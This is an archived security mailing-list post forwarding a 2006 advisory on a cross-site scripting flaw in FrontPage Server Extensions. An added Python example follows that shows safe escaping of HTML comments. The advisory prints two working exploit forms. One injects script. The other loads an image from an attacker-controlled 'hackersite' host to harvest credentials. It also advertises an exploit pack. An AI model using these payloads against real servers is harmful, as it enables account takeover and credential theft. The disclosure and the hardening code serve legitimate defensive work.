Security-Alerts mailing list archive (security-alerts@yandex-team.ru)


[security-alerts] FW: Vulnerability in Microsoft FrontPage Server Extensions Could Allow Cross-Site Scripting



Technical details of the vulnerability

> -----Original Message-----
> From: Windows NTBugtraq Mailing List 
> [mailto:NTBUGTRAQ@xxxxxxxxxxxxxxxxxxxxxx] On Behalf Of 
> Esteban Martinez Fayo
> Sent: Thursday, April 13, 2006 1:30 AM
> To: NTBUGTRAQ@xxxxxxxxxxxxxxxxxxxxxx
> Subject: Vulnerability in Microsoft FrontPage Server 
> Extensions Could Allow Cross-Site Scripting
> 
> Argeniss Security Advisory
> 
> 
> Name:  Vulnerability in Microsoft FrontPage Server Extensions Could Allow Cross-Site Scripting (MS06-17)
> Affected Software:  Microsoft FrontPage Server Extensions 2002 and Microsoft SharePoint Team Services
> Severity:  Medium
> Remote exploitable:  Yes (User intervention required)
> Credits:  Esteban Martínez Fayó
> Date:  4/11/2006
> Advisory Number:  ARG040602
> 
> 
> Details:
> The FrontPage Server Extensions 2002 (included in Windows Server 2003 IIS 6.0 and available as a separate download for Windows 2000 and XP) has a web page /_vti_bin/_vti_adm/fpadmdll.dll that is used for administrative purposes. This web page is vulnerable to cross-site scripting attacks, allowing an attacker to run client-side script on behalf of an FPSE user. If the victim is an administrator, the attacker could take complete control of a FrontPage Server Extensions 2002 server.
> 
> To exploit the vulnerability an attacker can send a specially crafted e-mail message to a FPSE user and then persuade the user to click a link in the e-mail message. In addition, this vulnerability can be exploited if an attacker hosts a malicious website and persuades the user to visit it.
> 
> The vulnerable parameters of fpadmdll.dll are "operation", "command", and "name". These parameters appear in the output without proper sanitization in an HTML comment, but it can be escaped with a '-->'.
> 
> Exploit Examples:
> 
> An attacker could create a FORM that POSTs to the FPSE server and executes a script on the client system.
> <form action=http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll method="POST">
> <input type="hidden" name="operation" value="--><script>alert()</script>">
> <input type="hidden" name="action" value="none">
> <input type="hidden" name="port" value="/LM/W3SVC/1:">
> <input type="submit" name="page" value="healthrp.htm">
> </form>
> 
> Also, an attacker could inject an image from another web site that he has control over and, if it has HTTP authentication, could convince the user to enter their credentials and capture them.
> <form action=http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll method="POST">
> <input type="hidden" name="operation" value="--><img src=http://hackersite/image.jpg>">
> <input type="hidden" name="action" value="none">
> <input type="hidden" name="port" value="/LM/W3SVC/1:">
> <input type="submit" name="page" value="healthrp.htm">
> </form>
> 
> 
> Vendor Status:
> Vendor was contacted and a patch was released.
> 
> 
> Patch Available:
> Apply patch MS06-017.
> 
> 
> Links:
> http://www.argeniss.com/research/ARGENISS-ADV-040602.txt
> http://www.microsoft.com/technet/security/Bulletin/MS06-017.mspx
> 
> 
> Spam:
> Argeniss Ultimate 0day Exploits Pack
> http://www.argeniss.com/products.html
> 
> 
> 
> Argeniss - Information Security
> *Application Security Experts*
> http://www.argeniss.com
> 
> 
> --
> NTBugtraq Editor's Note:
> 
> Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered.
> --
> 
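As an added example (not part of the advisory or the forwarded post), the following Python shows the unsafe pattern the advisory describes, a request parameter echoed into an HTML comment, beside a hardened rendering, and uses an HTML parser to check whether any script element survives in the output. The page template, the helper names and the sample value are assumptions, not FPSE code.

```python
"""Added example: why reflecting a parameter into an HTML comment is unsafe,
and one way to neutralize it.  Not code from the advisory or from FPSE."""
import html
import re
from html.parser import HTMLParser

# Constructed sample value of the kind the advisory describes: it closes the
# comment early so that whatever follows is parsed as live markup.
SAMPLE_VALUE = '--><script>alert()</script>'


def render_unsafe(operation: str) -> str:
    """Vulnerable pattern (hypothetical template): value echoed verbatim."""
    return f"<html><body><!-- operation: {operation} --><p>ok</p></body></html>"


def neutralize_comment_text(value: str) -> str:
    """Make a string safe to embed inside an HTML comment.

    Entity-escaping '<', '>' and '&' already removes every '-->' and '--!>'
    terminator.  We additionally collapse '--' runs: '--' is the prefix of
    every comment terminator and is not permitted in XHTML comments at all.
    """
    escaped = html.escape(value, quote=True)
    return re.sub(r"-{2,}", "-", escaped)


def render_hardened(operation: str) -> str:
    """Same hypothetical template, with the value neutralized first."""
    safe = neutralize_comment_text(operation)
    return f"<html><body><!-- operation: {safe} --><p>ok</p></body></html>"


class ScriptCounter(HTMLParser):
    """Counts <script> start tags that a browser would actually execute
    (text inside a comment never reaches handle_starttag)."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs) -> None:
        if tag == "script":
            self.scripts += 1


def count_script_elements(markup: str) -> int:
    """Return the number of live <script> elements in the rendered page."""
    parser = ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.scripts
```

Running `count_script_elements` over both renderings of `SAMPLE_VALUE` gives 1 for the unsafe template and 0 for the hardened one; the same parser check can be applied to captured responses as a regression test.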

Copyright © Lexa Software, 1996-2009.